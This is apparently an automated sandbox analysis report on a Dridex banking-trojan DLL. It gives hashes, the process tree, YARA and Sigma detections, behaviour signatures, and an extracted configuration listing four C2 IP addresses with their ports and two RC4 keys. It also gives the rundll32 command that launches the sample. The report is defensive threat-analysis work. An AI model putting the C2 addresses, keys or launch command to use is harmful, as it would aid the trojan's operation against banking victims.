Play interactive tour

Edit tour

Windows Analysis Report Pv3ZsGsdfS.dll

Overview

General Information

Sample Name:	Pv3ZsGsdfS.dll
Analysis ID:	544850
MD5:	63c22ce32346e029fa5a1ec1ae619d0f
SHA1:	222cf86c3b59f466292bb734be308cda77c3ddff
SHA256:	efbd76616dc1cd8210a8c54611f4ffa88e635f0f6ded2f8ff48311737635edda
Tags:	dll
Infos:
Most interesting Screenshot:

Detection

Dridex

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Dridex unpacked file

Multi AV Scanner detection for submitted file

Sigma detected: Suspicious Call by Ordinal

Tries to delay execution (extensive OutputDebugStringW loop)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

AV process strings found (often used to terminate AV products)

Sample file is different than original file name gathered from version info

One or more processes crash

Contains functionality to query locales information (e.g. system language)

Uses code obfuscation techniques (call, push, ret)

Checks if the current process is being debugged

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Creates a process in suspended mode (likely to inject code)

IP address seen in connection with other malware

Entry point lies outside standard sections

Abnormal high CPU Usage

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 6836 cmdline: loaddll32.exe "C:\Users\user\Desktop\Pv3ZsGsdfS.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)

cmd.exe (PID: 6852 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Pv3ZsGsdfS.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 6900 cmdline: rundll32.exe "C:\Users\user\Desktop\Pv3ZsGsdfS.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 7008 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6900 -s 684 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

Threatname: Dridex

{"Version": 22201, "C2 list": ["144.91.122.102:443", "85.10.248.28:593", "185.4.135.27:5228", "80.211.3.13:8116"], "RC4 keys": ["3IC8sFlUX9XZuoBQY9u5LhcZnHsV7E5r", "hnk63OiMfIbUqQnY7gkPwplwC0Ue5ZkZBYMCTYTjntqX7zsy9OvtNUlthJZXRtFF6P52Zbz6R5"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.749937166.000000006F4B1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000003.00000000.360348773.000000006F4B1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000003.00000000.358630922.000000006F4B1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000003.00000002.401542049.000000006F4B1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Unpacked PEs

Source	Rule	Description	Author
3.0.rundll32.exe.6f4b0000.5.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
3.2.rundll32.exe.6f4b0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
0.2.loaddll32.exe.6f4b0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
3.0.rundll32.exe.6f4b0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Sigma Overview

System Summary:

Sigma detected: Suspicious Call by Ordinal

Show sources

Source: Process started

Author: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\Pv3ZsGsdfS.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\Pv3ZsGsdfS.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Pv3ZsGsdfS.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6852, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\Pv3ZsGsdfS.dll",#1, ProcessId: 6900

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 3.0.rundll32.exe.6f4b0000.2.unpack

Malware Configuration Extractor: Dridex {"Version": 22201, "C2 list": ["144.91.122.102:443", "85.10.248.28:593", "185.4.135.27:5228", "80.211.3.13:8116"], "RC4 keys": ["3IC8sFlUX9XZuoBQY9u5LhcZnHsV7E5r", "hnk63OiMfIbUqQnY7gkPwplwC0Ue5ZkZBYMCTYTjntqX7zsy9OvtNUlthJZXRtFF6P52Zbz6R5"]}

Multi AV Scanner detection for submitted file

Show sources

Source: Pv3ZsGsdfS.dll

ReversingLabs: Detection: 34%

Source: Pv3ZsGsdfS.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: Pv3ZsGsdfS.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: combase.pdb? source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000006.00000003.364549220.0000000003526000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.370409238.0000000005691000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.364159227.00000000053D0000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.364216480.0000000003526000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000006.00000003.370414831.00000000057C0000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000006.00000003.370409238.0000000005691000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000006.00000003.370414831.00000000057C0000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: loaddll32.exe, 00000000.00000003.363070783.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.364211441.0000000003520000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.370409238.0000000005691000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.365235764.0000000003520000.00000004.00000001.sdmp
Source:	Binary string: sfc.pdb\|Q source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000006.00000003.370414831.00000000057C0000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000006.00000003.370409238.0000000005691000.00000004.00000001.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000006.00000003.370414831.00000000057C0000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000006.00000003.370409238.0000000005691000.00000004.00000001.sdmp
Source:	Binary string: powrprof.pdb' source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb1 source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000006.00000003.364221379.000000000352C000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.365022950.000000000352C000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.364554917.000000000352C000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.370409238.0000000005691000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 00000006.00000003.370414831.00000000057C0000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000006.00000003.370409238.0000000005691000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: RFFGTEQ.pdb source: Pv3ZsGsdfS.dll
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 00000006.00000003.364211441.0000000003520000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.365235764.0000000003520000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdbk source: WerFault.exe, 00000006.00000003.370414831.00000000057C0000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000006.00000003.370409238.0000000005691000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdbk source: WerFault.exe, 00000006.00000003.370414831.00000000057C0000.00000004.00000040.sdmp
Source:	Binary string: setupapi.pdb+ source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.363070783.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000006.00000003.370414831.00000000057C0000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdbk source: WerFault.exe, 00000006.00000003.370414831.00000000057C0000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 00000006.00000003.370409238.0000000005691000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdb} source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000006.00000003.370414831.00000000057C0000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000006.00000003.370414831.00000000057C0000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000006.00000003.370414831.00000000057C0000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 00000006.00000003.364221379.000000000352C000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.365022950.000000000352C000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.364554917.000000000352C000.00000004.00000001.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000006.00000003.370414831.00000000057C0000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb- source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: rundll32.pdb source: WerFault.exe, 00000006.00000003.370409238.0000000005691000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 00000006.00000003.364549220.0000000003526000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.364216480.0000000003526000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000006.00000003.370409238.0000000005691000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000006.00000003.370409238.0000000005691000.00000004.00000001.sdmp
Source:	Binary string: fltLib.pdb{ source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 144.91.122.102:443
Source: Malware configuration extractor	IPs: 85.10.248.28:593
Source: Malware configuration extractor	IPs: 185.4.135.27:5228
Source: Malware configuration extractor	IPs: 80.211.3.13:8116

Source: Joe Sandbox View	ASN Name: TOPHOSTGR TOPHOSTGR
Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE

Source: Joe Sandbox View	IP Address: 185.4.135.27 185.4.135.27
Source: Joe Sandbox View	IP Address: 85.10.248.28 85.10.248.28

Source: WerFault.exe, 00000006.00000002.398420518.000000000532D000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
Source: loaddll32.exe, 00000000.00000002.750012504.000000006F4CF000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.358686733.000000006F4CF000.00000002.00020000.sdmp	String found in binary or memory: http://www.baxleystamps.comDVarFileInfo$

E-Banking Fraud:

Yara detected Dridex unpacked file

Show sources

Source: Yara match	File source: 3.0.rundll32.exe.6f4b0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.6f4b0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.6f4b0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.6f4b0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.749937166.000000006F4B1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.360348773.000000006F4B1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.358630922.000000006F4B1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.401542049.000000006F4B1000.00000020.00020000.sdmp, type: MEMORY

System Summary:

Source: Pv3ZsGsdfS.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: Pv3ZsGsdfS.dll

Binary or memory string: OriginalFilenameShi.dllD vs Pv3ZsGsdfS.dll

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6900 -s 684

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6F4C0730	0_2_6F4C0730
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6F4C9370	0_2_6F4C9370
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6F4B8428	0_2_6F4B8428
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6F4C143C	0_2_6F4C143C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6F4BA4E8	0_2_6F4BA4E8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6F4B1494	0_2_6F4B1494

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6F4C2234 NtDelayExecution,		0_2_6F4C2234
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6F4C2820 NtAllocateVirtualMemory,		0_2_6F4C2820

Source: C:\Windows\System32\loaddll32.exe

Process Stats: CPU usage > 98%

Source: Pv3ZsGsdfS.dll

ReversingLabs: Detection: 34%

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Pv3ZsGsdfS.dll",#1

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\Pv3ZsGsdfS.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Pv3ZsGsdfS.dll",#1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Pv3ZsGsdfS.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6900 -s 684
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Pv3ZsGsdfS.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Pv3ZsGsdfS.dll",#1	Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6900

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERA8BF.tmp

Jump to behavior

Source: classification engine

Classification label: mal76.troj.evad.winDLL@6/6@0/4

Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Pv3ZsGsdfS.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: Pv3ZsGsdfS.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: combase.pdb? source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000006.00000003.364549220.0000000003526000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.370409238.0000000005691000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.364159227.00000000053D0000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.364216480.0000000003526000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000006.00000003.370414831.00000000057C0000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000006.00000003.370409238.0000000005691000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000006.00000003.370414831.00000000057C0000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: loaddll32.exe, 00000000.00000003.363070783.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.364211441.0000000003520000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.370409238.0000000005691000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.365235764.0000000003520000.00000004.00000001.sdmp
Source:	Binary string: sfc.pdb\|Q source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000006.00000003.370414831.00000000057C0000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000006.00000003.370409238.0000000005691000.00000004.00000001.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000006.00000003.370414831.00000000057C0000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000006.00000003.370409238.0000000005691000.00000004.00000001.sdmp
Source:	Binary string: powrprof.pdb' source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb1 source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000006.00000003.364221379.000000000352C000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.365022950.000000000352C000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.364554917.000000000352C000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.370409238.0000000005691000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 00000006.00000003.370414831.00000000057C0000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000006.00000003.370409238.0000000005691000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: RFFGTEQ.pdb source: Pv3ZsGsdfS.dll
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 00000006.00000003.364211441.0000000003520000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.365235764.0000000003520000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdbk source: WerFault.exe, 00000006.00000003.370414831.00000000057C0000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000006.00000003.370409238.0000000005691000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdbk source: WerFault.exe, 00000006.00000003.370414831.00000000057C0000.00000004.00000040.sdmp
Source:	Binary string: setupapi.pdb+ source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.363070783.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000006.00000003.370414831.00000000057C0000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdbk source: WerFault.exe, 00000006.00000003.370414831.00000000057C0000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 00000006.00000003.370409238.0000000005691000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdb} source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000006.00000003.370414831.00000000057C0000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000006.00000003.370414831.00000000057C0000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000006.00000003.370414831.00000000057C0000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 00000006.00000003.364221379.000000000352C000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.365022950.000000000352C000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.364554917.000000000352C000.00000004.00000001.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000006.00000003.370414831.00000000057C0000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb- source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: rundll32.pdb source: WerFault.exe, 00000006.00000003.370409238.0000000005691000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 00000006.00000003.364549220.0000000003526000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.364216480.0000000003526000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000006.00000003.370409238.0000000005691000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000006.00000003.370409238.0000000005691000.00000004.00000001.sdmp
Source:	Binary string: fltLib.pdb{ source: WerFault.exe, 00000006.00000003.370420682.00000000057C6000.00000004.00000040.sdmp

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6F4BF6A8 push esi; mov dword ptr [esp], 00000000h

0_2_6F4BF6A9

Source: initial sample

Static PE information: section where entry point is pointing to: .rdata

Source: C:\Windows\SysWOW64\WerFault.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
